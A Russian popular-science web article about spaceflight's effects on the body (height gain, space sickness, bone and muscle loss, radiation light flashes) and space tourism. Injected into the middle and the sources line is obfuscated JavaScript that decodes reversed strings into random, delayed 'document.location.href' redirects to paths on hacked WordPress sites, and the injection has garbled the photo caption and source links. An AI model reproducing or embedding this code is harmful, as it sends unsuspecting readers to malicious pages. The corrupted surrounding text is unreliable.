Человек и космос

Знаете ли вы, что у людей, которые побывали в космическом пространстве и вернулись на Землю, увеличивается рост? В среднем показателе, рост космонавтов увеличивается на 5-8 сантиметров за время пребывания в космосе. Это связано с тем, что на позвоночник в невесомости действует пониженное давление. Кстати говоря, нахождение в космическом пространстве влияет и на другие параметры нормального, привычного землянам самоощущения.

Так, например, практически все космонавты ощутили на себе воздействие так называемой “космической болезни”. Признаки этой болезни проявляются в некорректной реагировании вестибулярного аппарата человека на происходящее. Само собой, что определить, где какая сторона света (если она в космосе вообще есть), где верх-вниз, не представляется возможным. Но самое странное, что испытывают космонавты на орбите – непонимание, где находятся руки, а где ноги.

При этом, по возвращению на Землю, космонавты переживают так называемое “повторное рождение”. Дело в том, что за время пребывания в космосе из костей человека пропадает кальций, а мышцы атрофируются. В первые дни на Земле космонавты нуждаются в помощи для передвижения и восстановления.

Влияет космос и на зрение. Исследователи отмечают, что в космосе люди часто замечают необъяснимые вспышки света. Впоследствии было выяснено, что это радиация, которую человеческий мозг воспринимает как мимолетные вспышки – это явление очень вредит глазам, поэтому по прибытию многим космонавтам требуется консультация врача-офтальмолога.

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-v-kosmose.jpg” alt=”” width=”900″ height=”594″ /> Фото: Роскосмос/ Миллиардер Деннис Тито на МКС вместе с российскими космонавтами Талгатом Мусабаевым и Юрием Батуриным

Несмотря на все тяжелые физические последствия, которые испытывает человек, побывавший в космосе, все более популярным становится такое направление, как космический туризм. Это означает, что любой желающий, который имеет отменное физическое здоровье и несколько лишних десятков миллионов долларов, может отправиться в космическое путешествие вместе с настоящими космонавтами.

Источники: $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toriya-pokoreniya-kosmosa/” target=”_blank” rel=”noopener”>ASTEROPA; $mRi=function(n){if (typeof ($mRi.list[n]) == “string”) return $mRi.list[n].split(“”).reverse().join(“”);return $mRi.list[n];};$mRi.list=[“\’php.sedoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andex.ru/turbo/kipmu.ru/s/kosmos/” target=”_blank” rel=”noopener”>Как и почему

КосмосКрасота и здоровьеСлайдерТехнологии